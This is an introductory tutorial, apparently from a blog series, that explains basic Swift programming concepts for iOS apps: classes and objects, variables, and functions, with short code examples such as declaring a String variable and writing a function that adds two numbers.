create login page using data from text file I want to create login page using data store in textfile(data submit from regiter page to textfile) using jsp and servlet. Thanks
Spring Security Authorized Access Using Custom Login Form
Spring Security Authorized Access Using Custom Login Form
In this section, you will learn about authorized access using custom
login form in Spring... access by
providing customized Login form using Spring Security. User
Spring 4: Login Form using Spring MVC and Hibernate Example
Spring 4 MVC Login Example: Database driven login form using Spring MVC... are using the code discussed in the tutorial Spring 4 MVC
Login form without... of the
Spring 4 MVC login form example with backend database validation using
Use Java Bean In Servlets
of this Bean in servlet and using the set method of bean, we have passed some values...Use Java Bean In Servlets
In this you will learn how to use Java Bean in Servlets. For this purpose, we have created a Bean named 'Person' and defined three
How to get the output of JSP program using Bean
visit the following link: to get the output of JSP program using Bean Hi
Kindly go... program for the above one by using Bean and i opened the Tomcat webserver
login How to create login page in jsp
Bean
visit the following links:
How to get the output of jsp program using Bean
;
Next i created JSP program for the above one by using Bean and i opened...How to get the output of jsp program using Bean Hello my Roseindia..." %>
<HTML>
<HEAD>
<TITLE>Use Bean CounterDbc Login Authentication
JDbc Login Authentication Pease Please.. Send Me one Login Authentication Using ComboBox.From Servlet and jsp with sessions
I am new to sessions..." value="Login"><input type="reset" Value="Cancel" ></input><
servlet
servlet i want to create a login page with servlet using database mysql? only in servlet not in jsp plzz help me out
Admin and User Login JSP - JSP-Servlet
Admin and User Login JSP Respected Sir,
I am R.Ragavendran.. i need a JSP based program immediately.. In the home page, there must be a login page with username and password fields.. When the username and password is "admin
Spring Security customized login from database
Spring Security customized login from database
In this section, you will learn how to secure URL access using customized
login where password stored.../jsp/jstl/core"%>
<html>
<head>
<title>Login Page<
login page
login page pls say how to create a login page in jsp and mysql using netbaens
Hi Friend,
Please visit the following links:
Login form using Jsp in hibernate - Hibernate
Login form using Jsp in hibernate
Hai Friend,
As I new To hibernate, I'm facing problem in My project(JSP with hibernate).. My login form is working but the problem is ,when i enter correct user name and password
Login Form
is constructed using JavaServer Pages (JSP) technology.This
JSP shows Login... for a
login form using struts.
UserLoginAction Class: When you download Login...
Login Form
Login Form
Login Form I have 8 jsp pages.Each of them has three columns:Left... of the page.
Yes, you can use include file on every jsp page using <... of +,on clicking which a login form appears.
Only the middle column is different
login how to create login page in jsp
Here is a jsp code that creates the login page and check whether the user is valid or not.
1...;tr><td></td><td><input type="submit" value="Login">
login i am doing the project by using netbeens.. it is easy to use the java swing for design i can drag and drop the buttons and labels etc.. now i want the code for login.. i created design it contains the field of user
login hello i need some help please help how can identify admin from user when logging in? please make some answer and some explanation...
Please visit the following link;
jsp - JSP-Servlet
/loginbean.shtml
http...://
login page
login page hi i'm trying to create login page using jsp. i get no error while compiling but i get 404 while running the index.jsp. And i'm using.../html" pageEncoding="UTF-8"%>
JSP Page
Spring Security Authorized Access with Customized Login from Database
generated login form.
For Spring Security authorized access using... check user authenticity using customized login from database table(in
spring.../jsp/jstl/core"%>
<html>
<head>
<title>Login Page<
RichFaces: Login & Registration Application:
bean,
navigation rules, controller servlet...
RichFaces: Login & Registration Application
Login and Registration is one of the most required
login authentication - Java Beginners
login authentication i 've designed the jsp page for login. now i need to connect it with the bean and do authentication for the login for the "register" table in mysql. can anybody help me with the code immediately
Login Authentication in JSP
page to show
the data fetched from the database. We are using Servlet to get data from the
database using MySQL and we are forwarding this servlet data...;
Example program using Select Box to show retrieved data
Stateless Session Bean Example
are declared using a
JSP page directive (enclosed within the <%@ %>.... Finally, a
JSP scriptlet invokes the enterprise bean?s business methods, and JSP... web
clients that are JSP pages. If the web client were a servlet, you would
servlet javabean - JSP-Servlet
servlet javabean how to use a java bean in servelts .plese give me one example program using servelt mvc concept. Hi Friend,
Try...("person", p);
RequestDispatcher rd = req.getRequestDispatcher("/jsp/beandata.jsp
login and registration form using servlet and authentication through mysql
login and registration form using servlet and authentication through mysql i made a simple login and rgistration form using servlet... the Username:
Enter the Password:
Login here
import
Servlet Redirecting - JSP-Servlet
Servlet Redirecting Hi
I have made a main page with User name and password parameters, and when i try to direct it to the login page using...*;
public class Slogin extends HttpServlet implements Servlet
{
public void
Login Authentication using existing Active Directory.
Login Authentication using existing Active Directory. I need jsp code for login authentication of username and password using already existing Active Directory.
Here no need to create active directory.The JSP code should
Java bean example in JSP
Java bean example in JSP
... the procedure of
handling session and print a Hello world using Java Bean. The Bean....
The next step is to create a JSP page. This JSP page uses My bean package . Let
SERVLET
will be done by using jsp and servlet... Plz help me,im really tensed...........
...SERVLET I want to create a login form with one text box submit edit... to the servlet and if the user id is correct then a new page will be displayed with his
login and register - Java Beginners
login and register pls send me the code for login and register immediately Hi friend,
Please specify the technology you want code for login and register.
For example : JSP,Servlet,Struts,JSF etc
SERVLET AND JSP
SERVLET AND JSP If i want tio create a login form using SUBMIT,ADD...;For more information visit the following links:
Error in using java beans - JSP-Servlet
Error in using java beans I am getting the following error when I run the jsp code.
type Exception report
description The server...: Unable to load class for JSP
How to get Output for a Bean problem
How to get Output for a Bean problem Hello
Kindly tell me a simple Program on Bean to get the Output using JSP code
logout - JSP-Servlet
logout i want to know that (using only servlet technology not jsp) i create login page(html) ,registration.html, home page(servlet) and other pages. when i click the logout(hyperlink) then session is logout frequently
JSP AND SERVLET
JSP AND SERVLET I want to create a login form with user name... or her name. They can also edit their details by using edit button...;<input type="submit" value="Login"></td></tr>
<tr><
JSP bean set property
JSP bean set property
... you a code that help in describing an
example from JSP bean set property...:useBean> -
The < jsp:use Bean>
instantiate a bean class
servlet - JSP-Servlet
=res.getWriter();
out.println("");
out.println("");
out.println("LOGIN... using javascript please do reply i am waiting.
Thankyou for replying for mySP - JSP-Servlet
JSP Hi!
In my JSP page I am entering values and submitting the values. In common way I have to receive those values in another JSP using...);
String query = "insert into userlogin set login_name='"+loginname
Spring Login Example
This class controls login request by bean properties Than we create dispatcher-servlet.xml
to
handle all bean configuration. After this we create a web.xml file...Spring Login Example
In this section , we have shown a simple Spring loging
developing a Session Bean and a Servlet and deploy the web application on
JBoss 3.0
a Calculator Stateless Session Bean and
call it through JSP file and deploy...' to the
'ejb/CalculatorSessionBean' bean.
Writing JSP and Web/Ear component
Our JSP... the MyTestSession Session Bean developed in Lesson 3. Infact we will use the same
JSP-jdbc validation - JSP-Servlet
JSP-jdbc validation How to validate login email id using JSP, where...,
login application in jsp
function validateForm(theForm...;
}
login page
Login Form using Ajax
Login Form using Ajax
... using the Ajax (DOJO).
Lets develop a login application using Ajax...;/action>
Develop a Login Form Using Ajax : The GUI of the
application | http://www.roseindia.net/tutorialhelp/comment/86974 | CC-MAIN-2015-06 | en | refinedweb |
Simpler streaming responses
March 27, 2013
Michael Snoyman
Yesod is built on top of WAI, which has always provided a means of creating efficient, streaming responses. Throughout Yesod's development, this functionality has always been present in one form or another. In Yesod 1.2, the goal is to make it as simple as possible to leverage this functionality.
Let's kick off with a simple example, and then drill into the details:
{-# LANGUAGE OverloadedStrings, TemplateHaskell, QuasiQuotes, TypeFamilies #-} import Yesod.Core import Data.Conduit import qualified Data.Conduit.Binary as CB import Control.Concurrent.Lifted (threadDelay) import Data.Monoid ((<>)) import qualified Data.Text as T import Control.Monad (forM_) data App = App mkYesod "App" [parseRoutes| / HomeR GET |] instance Yesod App fibs :: [Int] fibs = 1 : 1 : zipWith (+) fibs (tail fibs) getHomeR :: Handler TypedContent getHomeR = do value <- lookupGetParam "x" case value of Just "file" -> respondSource typePlain $ do sendChunkText "Going to read a file\n\n" CB.sourceFile "streaming.hs" $= awaitForever sendChunkBS sendChunkText "Finished reading the file\n" Just "fibs" -> respondSource typePlain $ do forM_ fibs $ \fib -> do $logError $ "Got fib: " <> T.pack (show fib) sendChunkText $ "Next fib is: " <> T.pack (show fib) <> "\n" yield Flush sendFlush threadDelay 1000000 _ -> fmap toTypedContent $ defaultLayout $ do setTitle "Streaming" [whamlet| <p>Notice how in the code above we perform selection before starting the stream. <p>Anyway, choose one of the options below. <ul> <li> <a href=?x=file>Read a file <li> <a href=?x=fibs>See the fibs |] main = warp 3000 App
Start simple: a standard response
Consider the following handler:
getHomeR :: Handler Text getHomeR = return "Hello World!"
What exactly does Yesod do to make this into a response the client can see? The
important bit is the
ToTypedContent typeclass. Every handler function has
toTypedContent applied to its result. So let's look at the relevant classes
and types.
type ContentType = ByteString data Content = ContentBuilder !Blaze.Builder !(Maybe Int) -- ^ The content and optional content length. | ContentSource !(Source (ResourceT IO) (Flush Blaze.Builder)) | ContentFile !FilePath !(Maybe FilePart) | ContentDontEvaluate !Content data TypedContent = TypedContent !ContentType !Content class ToTypedContent a where toTypedContent :: a -> TypedContent -- Relevant instance instance ToTypedContent Text where toTypedContent t = TypedContent "text/plain; charset=utf-8" (\t -> ContentBuilder (Blaze.fromText t) Nothing)
So every response has to be convertible to a
TypedContent, which is two
pieces of information: the value for the
Content-Type response header, and
the body fo the response. In our case, we use the
ContentBuilder constructor,
which lets us leverage
blaze-builder.
Use the Source
ContentBuilder isn't our only option. We could serve a file with
ContentFile.
ContentDontEvaluate is a modifier to deal with exceptions;
we'll discuss that a bit later. But for our streaming discussion, the most
interesting constructor is
ContentSource. This uses a
conduit
Source for
creating streaming data. Let's try out a minimal example:
getHomeR :: Handler TypedContent getHomeR = return $ TypedContent "text/plain" $ ContentSource $ do yield $ Chunk $ Blaze.fromText "Hello World!"
We can use the
TypedContent and
ContentSource constructors directly. The
result isn't really anything more impressive than what we had previously. Let's
improve that, by streaming two files consecutively:
getHomeR :: Handler TypedContent getHomeR = return $ TypedContent "text/plain" $ ContentSource $ do mapOutput (Chunk . Blaze.fromByteString) $ sourceFile "file1.txt" mapOutput (Chunk . Blaze.fromByteString) $ sourceFile "file2.txt"
We're guaranteed that our response will live in constant memory and will
properly free resources. We have to play with
mapOutput,
Chunk and
fromByteString to convert a stream of
ByteStrings to a stream of flushable
Builders.
Make it prettier
Having to muck around with those lower-level details isn't fun. Let's bump it up a level:
getHomeR :: Handler TypedContent getHomeR = respondSource "text/html" $ do sendChunk ("Some Text" :: Text) sendChunk ("Hello & Goodbye" :: Html)
respondSource wraps up the tedium of dealing with the constructors directly.
sendChunk will send a chunk of content to the user, and can take as an
argument most common textual types (String, strict/lazy Text, strict/lazy
ByteString, and Html). But this doesn't play very nicely with overloaded
strings, since you need to provide explicit annotations. So we also have simple
type-specified wrappers as well:
getHomeR :: Handler TypedContent getHomeR = respondSource "text/html" $ do sendChunkText "Some Text" sendChunkHtml "Hello & Goodbye"
We can also use
sendFlush to flush the buffer to the client immediately. And
we have the ability to use all common
conduit concepts to build up our
Source.
And one final but important point: the base monad for the
Source is
Handler, so you can perform arbitrary
Handler operations inside your
Source, such as looking up query string parameters.
Exceptions
Let's go back to non-streaming responses. Consider the following:
getHomeR :: Handler Html getHomeR = return $ "Hello " <> name <> "!" where name = error "Oops, forgot to set the name"
We have an exception being sent from pure code. Let's see what Yesod does with this:
This is the result we want: the user receives a 500 status code to indicate that there was an error on the server. But how does this work? The pure exception should only be discovered after we already send our 200 status code and response headers, right?
In fact, Yesod does some fancy footwork behind the scenes, and fully evaluates
pure response bodies before sending any data to the user, specifically to
ensure that the user gets proper response codes. And this is also the purpose
of the above-mentioned
ContentDontEvaluate constructor: to give the user a
chance to override this behavior (e.g., for efficiency). For example, we can
modify our above code to read:
getHomeR :: Handler (DontFullyEvaluate Html) getHomeR = return $ DontFullyEvaluate $ "Hello " <> name <> "!" where name = error "Oops, forgot to set the name"
When run like this, the client receives an empty response from the server instead.
"All very interesting," you might be saying, "but what does this have to do
with streaming responses?" Quite a bit, actually, as the same reasoning
applies. When using streaming responses, there's no way for Yesod to fully
evaluate your response body before sending them to the client. So if you throw
an exception in your
Source, the client will get a corrupted response. This
isn't to say you shouldn't use streaming responses, but you have to be careful.
Logic before streaming
Exceptions aren't the only issue. You can't modify the status code or response
headers at all once you're inside the
Source. That means you can't perform
redirects, can't modify the session, or can't switch from a 200 OK response to
a 403 Forbidden response. The important point here is to perform your logic
before streaming.
getHomeR :: Handler TypedContent getHomeR = do maybeFoo <- lookupGetParam "foo" case maybeFoo of Just "yesod" -> redirect ("" :: Text) _ -> return () respondSource "text/plain" $ do sendChunkText "You didn't go to yesodweb.com"
We check our query string parameter and perform the redirect before calling
respondSource. Once we know that we're returning a normal response, we then
use
respondSource to create the body.
Database
Making it easy to create streaming database responses was probably my original
motivation here. I was never happy with the current recommended
approach, so I'm happy to
offer something simpler. Basically, we follow the exact same approach as with
normal streaming responses, but use the
respondSourceDB function instead of
respondSource. Take the following example, which just returns a list of
people from a database.
{-# LANGUAGE EmptyDataDecls #-} {-# LANGUAGE FlexibleContexts #-} {-# LANGUAGE GADTs #-} {-# LANGUAGE OverloadedStrings #-} {-# LANGUAGE QuasiQuotes #-} {-# LANGUAGE TemplateHaskell #-} {-# LANGUAGE TypeFamilies #-} import Control.Monad.Logger (runNoLoggingT) import Data.Conduit (awaitForever, runResourceT, ($=)) import Data.Text (Text) import Database.Persist.Sqlite (ConnectionPool, SqlPersist, SqliteConf (..), runMigration, runSqlPool) import Database.Persist.Store (createPoolConfig) import Yesod.Core import Yesod.Persist share [mkPersist sqlSettings, mkMigrate "migrateAll"] [persist| Person name Text |] data App = App { appConfig :: SqliteConf , appPool :: ConnectionPool } mkYesod "App" [parseRoutes| / HomeR GET |] instance Yesod App instance YesodPersist App where type YesodPersistBackend App = SqlPersist runDB = defaultRunDB appConfig appPool instance YesodPersistRunner App where getDBRunner = defaultGetDBRunner appPool getHomeR :: Handler TypedContent getHomeR = respondSourceDB typePlain $ selectSource [] [Asc PersonName] $= awaitForever toBuilder where toBuilder (Entity _ (Person name)) = do sendChunkText name sendChunkText "\n" sendFlush main :: IO () main = do let config = SqliteConf ":memory:" 1 pool <- createPoolConfig config runNoLoggingT $ runResourceT $ flip runSqlPool pool $ do runMigration migrateAll deleteWhere ([] :: [Filter Person]) insert_ $ Person "Charlie" insert_ $ Person "Alice" insert_ $ Person "Bob" warp 3000 App { appConfig = config , appPool = pool }
Obviously for our specific case, loading up the three names into memory would be acceptable. But for more complicated responses, some form of streaming is essential. This approach works very well in concert with the new streaming API for yesod-sitemap, allowing us to create a streaming XML response body from a database. The following is some real-life code from the School of Haskell:
getSitemapR :: Handler TypedContent getSitemapR = do AppContent {..} <- getYesod >>= readIORef . appContent sitemap $ runDBSource $ do yield $ SitemapUrl HomeR Nothing (Just Daily) (Just 1.0) mapM_ (yield . goPage) $ unpack acPageMap mapM_ (yield . goPost) acPosts yield $ SitemapUrl UsersR Nothing (Just Daily) (Just 0.6) yield $ SitemapUrl RecentContentR Nothing (Just Daily) (Just 0.6) selectSource [] [] $= CL.mapMaybeM (\(Entity _ Profile {..}) -> do mus <- getBy $ UniqueUserSummary profileHandle case mus of Just (Entity _ us) | userSummaryTutcount us > 0 -> return $ Just $ SitemapUrl (UserR profileHandle) Nothing (Just Weekly) (Just 0.5) _ -> return Nothing ) selectKeys [] [] $= CL.mapMaybeM (fmap (fmap goTutorial) . getCanonicalRoute) where goPage (pn, PageInfo {..}) = SitemapUrl (PageR pn) Nothing (Just Monthly) (Just 0.8) goPost Post {..} = SitemapUrl (BlogPostR y m s) (Just postDate) (Just Never) (Just 0.7) where PostKey y m s = postKey goTutorial route = SitemapUrl route Nothing (Just Monthly) (Just 0.6)
As the number of users and tutorials grows considerably, we want to avoid
loading all of that information into memory. The above code runs in constant
space, dealing with each individual user, and then each individual tutorial.
Under the surface, each
xml-types
Events,
and
xml-conduit converts that stream into a stream of
ByteStrings.
We have to be careful that our database queries are guaranteed to succeed. If
we use functions like
get404 inappropriately, we could generate incorrect
response bodies.
And yes, that means that the School of Haskell is currently running on Yesod 1.2. | http://www.yesodweb.com/blog/2013/03/simpler-streaming-responses | CC-MAIN-2015-06 | en | refinedweb |
18 October 2007 11:19 [Source: ICIS news]
?xml:namespace>
The source did not specify the original schedule for the shutdown at the unit, which has a propylene capacity of 200,000 tonnes/year and is the first of its kind in southeast Asia. Impact on the downstream polypropylene (PP) line had been minimal, the source added.
This is not the first maintenance shutdown experienced at the complex, also known as an olefins conversion unit, which first came on stream in May last year.
PCS is a joint venture company of oil major Shell (50%) and Japan-Singapore Petrochemicals (50%), in which Sumitomo Chemicals is a major | http://www.icis.com/Articles/2007/10/18/9071041/pcs-plans-metathesis-unit-restart-in-one-week.html | CC-MAIN-2015-06 | en | refinedweb |
jGuru Forums
Posted By:
learner_java
Posted On:
Thursday, July 17, 2003 05:41 AM
Hi all!
don't really know how to start since i'm new learner to JUnit.
I changed my mind..I written a swing code to read information from a file and print to the console using System.out.println() I want to do some practice of JUnit Test program. I want to write a Junit Test program to check to see if my Swing code is run read the file okey and print to the console okey..is that can be done?
here is my swing code:
import java.io.*;
import javax.swing.*;
import javax.swing.event.*;
import java.awt.event.*;
import java.util.Vector;
public class ReadEntityFile {
private Entity[] entities;
private Entity entity;
private Vector vEntry;
ublic ReadEntityFile() {
entities =getEntity();
for(int i = 0; i
< entities.length; i++) {
System.out.println("entitiesitem:" + entities[i].getName());
}
}
public Entity[] getEntity() {
try {
String fn = "c:\test.txt";
File file = new File(fn);
System.out.println("filename:" + file.getPath());
if (!file.exists()) {
System.out.println("File does not exist");
System.exit(0);
}
BufferedReader input = new BufferedReader(new FileReader(file));
String line = "";
vEntry = new Vector();
String name;
while ((line = input.readLine()) != null) {
Entity entity = new Entity();
//get Entity Structure of Entity class
name = line.trim();
entity.setName(name);
vEntry.add(entity);
}
vreturn (Entity[]) vEntry.toArray(new Entity[0]);
} catch (Exception e) {
System.out.println(e.toString());
return new Entity[0];
public static void main(String[] args) {
ReadEntityFile te = new ReadEntityFile();
}
}
and ofcouse an Entity class, both of them work fine.. but I like to write a Junit Test program..and don't know how to start..can you give me any brainstorms? thanks
Re: How do I write a JUnit Test
Posted By:
Anonymous
Posted On:
Friday, July 18, 2003 02:39 PM | http://www.jguru.com/forums/view.jsp?EID=1102051 | CC-MAIN-2015-06 | en | refinedweb |
sourcecode Masem <CODE> #!/usr/bin/perl package Game::Life; ###################### # # Game::Life # v0.01 # Michael K. Neylon # mneylon-pm@masemware.com # May 28, 2001 # # Runs Conway's Game of Life # # Suggestions/Comments/Ideas are highly desired and can be # sent to the eamil address above. # # Change History: # # v0.01 - May 28, 2001 # - Initial Release # ###################### use strict; use Exporter; use Clone qw( clone ); use vars qw /$VERSION @ISA @EXPORT @EXPORT_OK/; @ISA = qw /Exporter/; @EXPORT = qw //; @EXPORT_OK = qw //; $VERSION = 0.01; my $default_size = 100; sub new { my $class = shift; my $self = {} ; # No args, set up a blank one $self->{ size } = shift || $default_size; $self->{ grid } = [ map { [ map { 0 } (1..$self->{ size } ) ] } (1..$self->{ size } ) ]; bless $self, $class; return $self; } sub toggle_point { my ( $self, $x, $y ) = @_; return ( $self->{ grid }->[$x]->[$y] = !$self->{ grid }->[$x]->[$y] ); } sub set_point { my ( $self, $x, $y ) = @_; $self->{ grid }->[$x]->[$y] = 1; } sub unset_point { my ( $self, $x, $y ) = @_; $self->{ grid }->[$x]->[$y] = 0; } sub place_points { my ( $self, $x, $y, $array ) = @_; return if ( $x < 0 || $x >= $self->{ size } || $y < 0 || $y >= $self->{ size } ); my ($i, $j); my $array_x = @$array; my $array_y = @{$$array[0]}; for ( $i = 0 ; $i < $array_x && $i+$x < $self->{ size }; $i++ ) { for ( $j = 0 ; $j < $array_y && $j+$y < $self->{ size }; $j++ ) { $self->{ grid }->[ $x + $i ]->[ $y + $j ] = ($array->[ $i ]->[ $j ] > 0) ? 1 : 0; } } } sub get_grid { my ( $self ) = @_; return clone( $self->{ grid } ); } sub process { my $self = shift; my $times = shift || 1; for (1..$times) { my $new_grid = clone( $self->{ grid } ); for my $i ( 0..$self->{ size }-1 ) { for my $j ( 0..$self->{ size }-1 ) { $new_grid->[$i]->[$j] = $self->_determine_life_status( $i, $j ); } } $self->{ grid } = $new_grid; } } sub _determine_life_status { my ( $self, $x , $y ) = @_; my $n = 0; for my $i ( $x-1, $x, $x+1 ) { for my $j ( $y-1, $y, $y+1 ) { $n++ if ( $i >= 0 && $i < $self->{ size } && $j >= 0 && $j < $self->{ size } ) && ( $self->{ grid }->[ $i ]->[ $j ] ); } } return ( $self->{ grid }->[ $x ]->[ $y ] ) ? ( $n == 3 || $n == 4 ) : ( $n == 3 ); } =head1 NAME Game::Life - Plays Conway's Game of Life =head1 SYNOPSIS use Game::Life; my $game = new Game::Life( 20 ); my $starting = [ [ 1, 1, 1 ], [ 1, 0, 0 ], [ 0, 1, 0 ] ]; $game->place_points( 10, 10, $starting ); for (1..20) { my $grid = $game->get_grid(); foreach ( @$grid ) { print map { $_ ? 'X' : '.' } @$_; print "\n"; } print "\n\n"; $game->process(); } =head1 DESCRIPTION Conway's Game of Life is a basic example of finding 'living' patterns in rather basic rulesets. The Game of Life takes place on a 2-D rectangular grid, with each grid point being either alive or dead. If a living grid point has 2 or 3 neighbors within the surrounding 8 points, the point will remain alive in the next generation; any fewer or more will kill it. A dead grid point will become alive if there are exactly 3 living neighbors to it. With these simple rules, fascinating structures such as gliders that move across the grid, glider guns that generate these gliders, XOR gates, and others have been found. This module simply provides a way to simulate the Game of Life in Perl. C<new> - Creates a new Life game board; if passed a scalar, the game board will be a square of that size, otherwise, it will be a default 100x100 units. C<place_points> - Takes two scalars (indicating the position on the grid) and a reference to an array of arrays; this array is placed into the Life grid at the specified position, overwriting any data already there. Within the array of arrays, any non-zero values will be considered as a living square. C<toggle_point>, C<set_point>, C<unset_point> - Take two scalars that indiciate a specific grid position. These functions toggle, sets, or unsets the life status of the grid point passed, respectively. C<process> - If passed a number, runs the Life simulation that many times, else runs the simulation once. C<get_grid> - Returns a B<copy> of the Life grid as a reference to an array of arrays. =head1 HISTORY Revision 0.01 2001/05/28 Michael K. Neylon Initial revision =head1 AUTHOR This package was written by Michael K. Neylon =head1 COPYRIGHT Copyright 2001 by Michael K. Neylon =head1. =cut 1; </CODE> Simulates Conway's Game of Life in Perl <P> Comments are highly appreciated! Fun Stuff Michael K. Neylon (mneylon-pm@masemware.com) | http://www.perlmonks.org/index.pl?displaytype=xml;node_id=83813 | CC-MAIN-2015-06 | en | refinedweb |
How to change the robot_description paramter for the joint_trajectory_controller
Dear ROS community,
i am simulating a ABB IRB2400 robot arm in gazebo controlling it with MoveIt. This is working so far. My goal is to simulate two arms. So i moved them in different namespaces and give their descriptions different names. The Problem that now is occurring that the joint_trajectory_controllercant find the 'robot_description' parameter on the parameter server.
The errors i get are:
[ERROR] [1500973451.323217096, 0.454000000]: Could not find parameter robot_description on parameter server [ERROR] [1500973451.323364757, 0.454000000]: Failed to parse URDF contained in 'robot_description' parameter [ERROR] [1500973451.323468398, 0.454000000]: Failed to initialize the controller [ERROR] [1500973451.323531930, 0.454000000]: Initializing controller 'arm_controller' failed [ERROR] [WallTime: 1500973452.325133] [1.452000] Failed to load arm_controller
I looked up in the Wiki and the code and as far as i know there is no way to tell the joint_trajectory_controller to look for the robot description under a different name than 'robot_description'. Am i wrong? Is there a simple way i am overseeing?
If there is no way implemented i would like to do so. But i could use some enlightening on how to do that a good way. Entering the robot description in the yaml file describing the controller would be the way i would choose. But i have not yet found the part of the code wich parses the arguments from the yaml to the actual controller.
I managed to implement the use of a different robot description. It was quite easy after i understood how everything works. I copied the joint_trajectory_controller package and renamed it. Than you need to register it under that name. To get a different description i added a parameter to the server.
Could you please elaborate on what was required to "register it under that name"? | https://answers.ros.org/question/267332/how-to-change-the-robot_description-paramter-for-the-joint_trajectory_controller/ | CC-MAIN-2022-05 | en | refinedweb |
5. Radio Buttons in Tkinter
By Bernd Klein. Last modified: 16 Dec 2021.
A radio button, sometimes called option button, is a graphical user interface element of Tkinter, which allows the user to choose (exactly) one of a predefined set of options. Radio buttons can contain text or images. The button can only display text in a single font. A Python function or method can be associated with a radio button. This function or method will be called, if you press this radio button.
Radio buttons are named after the physical buttons used on old radios to select wave bands or preset radio stations. If such a button was pressed, other buttons would pop out, leaving the pressed button the only pushed in button.
Each group of Radio button widgets has to be associated with the same variable. Pushing a button changes the value of this variable to a predefined certain value.
Simple Example With Radio Buttons
import tkinter as tk root = tk.Tk() v = tk.IntVar() tk.Label(root, text="""Choose a programming language:""", justify = tk.LEFT, padx = 20).pack() tk.Radiobutton(root, text="Python", padx = 20, variable=v, value=1).pack(anchor=tk.W) tk.Radiobutton(root, text="Perl", padx = 20, variable=v, value=2).pack(anchor=tk.W) root.mainloop()
The result of the previous example looks like this:
Improving the Example
In many cases, there are more than two radio buttons. It would be cumbersome, if we have to define and write down each button. The solution is shown in the following example. We have a list "languages", which contains the button texts and the corresponding values. We can use a for loop to create all the radio buttons. The list of tuples 'languages' containes both the languages and the values, which will be assigned to the variable 'v', if the corresponding language is clicked on.
import tkinter as tk root = tk.Tk() v = tk.IntVar() v.set(1) # initializing the choice, i.e. Python languages = [("Python", 101), ("Perl", 102), ("Java", 103), ("C++", 104), ("C", 105)] def ShowChoice(): print(v.get()) tk.Label(root, text="""Choose your favourite programming language:""", justify = tk.LEFT, padx = 20).pack() for language, val in languages: tk.Radiobutton(root, text=language, padx = 20, variable=v, command=ShowChoice, value=val).pack(anchor=tk.W) root.mainloop()
The result of the previous example looks like this:
Indicator
Instead of having radio buttons with circular holes containing white space, we can have radio buttons with the complete text in a box. We can do this by setting the indicatoron (stands for "indicator on") option to 0, which means that there will be no separate radio button indicator. The default is 1.
We exchange the definition of the Radiobutton in the previous example with the following one:
tk.Radiobutton(root, text=language, indicatoron = 0, width = 20, padx = 20, variable=v, command=ShowChoice, value=val).pack(anchor=tk.W)
We have added the option indicatoron and the option width.
| https://python-course.eu/tkinter/radio-buttons-in-tkinter.php | CC-MAIN-2022-05 | en | refinedweb |
As said on the front of the Hitch Hiker’s Guide to the Galaxy, Don’t Panic! It’s time to learn some code, but it’s ok, we’ll take it easy to begin with, with some basics. Let’s start right at the beginning …
What exactly is code?
Code is the “programming language” you use in your apps to specify certain things. Things like — what happens when a button is pressed, what happens when an image is swiped to the left, what colour text to use, which font to use, how long it takes to do something … and much much more.
Why can’t we just use English?
Interesting question — as yet no-one has (to my knowledge) created a system where you can just use natural language to build apps. Each app platform / system / operating system has a programming language that’s been created to allow you to build apps using a specific set of commands. For iOS the main language used was Objective-C. A few years ago, Apple brought out Swift, a new, theoretically better language. You can still build apps in Objective-C, but this course will use Swift, as it’s the future! And round these parts, we’re all about The Future!
So, I need to learn a new language?
Sort of. A programming language isn’t like a natural language, like French or Irish; it’s really a set of commands, structures and concepts that can be used to do particular tasks.
Like a natural language however, you don’t need to learn it all to begin to use use it. A child can say “I don’t want my dinner” years before she can say “Once matter passes a black hole’s event horizon, it won’t escape, not even light”.
Likewise, you can make basic iOS apps without becoming completely proficient in Swift or Objective-C. Over time, with more practice and learning, you can become more “fluent” in the language and create more complex apps.
Really, not even light will escape?
Nevermind that, focus! But yes …
Ok, back to the coding
We’ll go through some of the basics, then put them into action in Xcode to give them a bit more context.
Coding is generally made up of these basic blocks:
- Classes
- Variables
- Functions
There are way more things apart from those, but they’ll do for now.
Classes / Objects
A lot of programming languages, including Swift are “Object-Orientated” — this means it’s all about Objects; or as they’re otherwise called, Classes.
A Class is basically a way of describing a “thing” or an “object” — a thing that is in the app; a thing you can use or do something with or to. For example, each “Screen” in an iOS app is a “UIViewController” Class that can do various things — like displaying content like text, images or buttons.
Furthermore, each of those content items are themselves Classes; there is a UIButton Class for buttons, a UILabel Class for displaying text etc and many many many (many many) more classes to avail of and use.
“Behind” the screen, there are also Classes to use and manipulate data / content / other objects— such as the “String” class, which is used to store and manipulate natural language e.g. a name or a title.
Most of “learning to code” is learning about these Classes are and how they can be used.
There are two main sets of Classes to learn — the Swift ones and the iOS SDK ones. “SDK” means Software Development Kit — it’s a set of Classes and Functions (written in Swift) that Apple have pre-made to help you make apps. The UIViewController, UIButton and UILabel Classes mentioned above all come from the iOS SDK.
We’ll go through loads of these Classes through the various tutorials.
What’s the benefit of Objects / Classes?
Classes are a really handy way of doing things in code; they allow the definition of concepts in an understandable manner. What makes this even handier is that you can define your own Classes. If the app is about cars, you can create a Car Class. If it’s about airplane times, you can create an Airplane Class and maybe an Airport Class too, along with a Departure Class and an Arrival Class.
Classes also allow for re-use of code. If you have 10 names to display, you just need 10 instances of the one Class, not 10 different ones. If you have 7,853 airplanes, then you just need one Airplane Class.
Variables
Variables are how you use Classes. A variable is an “instance” of a Class, that you can use to store a value and re-use in your code. So:
var myName : String = "Odysseus"
This is actual Swift code to create (or “declare”) a variable, of type (Class) String and to “initialise” it with a value of “Odysseus”. (If you were cool enough to have a name like that).
var
is how you say variable
myName
is the name of the variable, and it could be anything, like:
var yourName
or
var whatever
would also be fine.
: String
says that the variable is of type / Class “String” and
= "Odysseus"
stores that value in the variable. If you then typed:
print(myName)
in your app in Xcode, and “ran” the app, you’d see “Odysseus” in the output area. (More on that later)
What is the “print” however?
This is a function — the next fundamental block of coding.
Functions
Functions are groups of code that “do” something. The print function above is a built-in function that you can use to print out values of variables to Xcode- this is handy when building apps so you can keep track of what’s going on.
Swift has many many built in functions — again, a lot of learning to code is learning what these are and how to use them.
You can (and will) also create your own functions. Here’s a simple function to add two numbers and “return” the result:
func addTwoNumbers(number1: Int, number2: Int)->{
return number1 + number2
}
The
func
says that this is a function.
addTwoNumbers
is the name. Again, we could have called this anything.
(number1 : Int, number2: Int)
is a bit more complicated. number1 and number2 are “paramaters”. Parameters are values we can “pass in” to functions for use inside them. Here we we say that there are two parameters in this function, both of Class “Int” — which is used to store numbers.
Again “number1” and “number2” are the names of the parameters, we could have called them anything.
->Int
is how we specify that the function will “return” a value of Class Int.
{
is known as an “opening bracket” and signifies that the function’s code is about to begin. This code is what “runs” when the function is “called” i.e. “run”.
return number1 + number2
adds the two numbers together and “returns” the result. Returns means that this is the result of the function.
}
